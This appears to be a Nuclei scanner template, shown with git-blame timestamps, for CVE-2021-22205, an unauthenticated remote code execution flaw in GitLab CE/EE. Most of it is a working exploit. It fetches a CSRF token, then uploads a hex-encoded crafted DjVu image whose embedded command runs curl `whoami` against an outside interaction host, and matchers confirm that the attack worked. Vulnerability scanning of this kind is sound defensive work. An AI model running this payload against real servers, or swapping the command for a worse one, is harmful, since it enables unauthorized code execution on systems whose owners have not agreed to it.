2022-01-20 08:55:57 +00:00
id : gitlab-rce
info :
2022-03-04 20:58:39 +00:00
name : GitLab CE/EE Unauthenticated RCE Using ExifTool
2022-01-20 08:55:57 +00:00
author : pdteam
severity : critical
2022-08-27 04:41:18 +00:00
description : GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2.
2022-01-20 08:55:57 +00:00
reference :
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
2022-08-27 04:41:18 +00:00
remediation : Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher.
2022-01-20 08:55:57 +00:00
classification :
2022-03-04 20:58:39 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-08-27 04:41:18 +00:00
cvss-score : 10
2022-01-20 08:55:57 +00:00
cve-id : CVE-2021-22205
cwe-id : CWE-20
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-04-22 10:38:41 +00:00
shodan-query : http.title:"GitLab"
2022-08-27 04:41:18 +00:00
tags : oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev
2022-01-20 08:55:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-20 08:55:57 +00:00
- raw :
- |
GET /users/sign_in HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
- |
POST /uploads/user HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token : {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse : true
2022-03-02 15:45:47 +00:00
max-redirects : 3
2022-01-20 08:55:57 +00:00
matchers-condition : and
matchers :
- type : word
words :
- 'Failed to process image'
- type : status
status :
- 422
extractors :
- type : regex
name : csrf-token
internal : true
group : 1
regex :
2022-03-02 15:45:47 +00:00
- 'csrf-token" content="(.*?)" />'
2022-01-20 08:55:57 +00:00
- type : regex
part : interactsh_request
group : 1
regex :
2022-03-04 20:58:39 +00:00
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'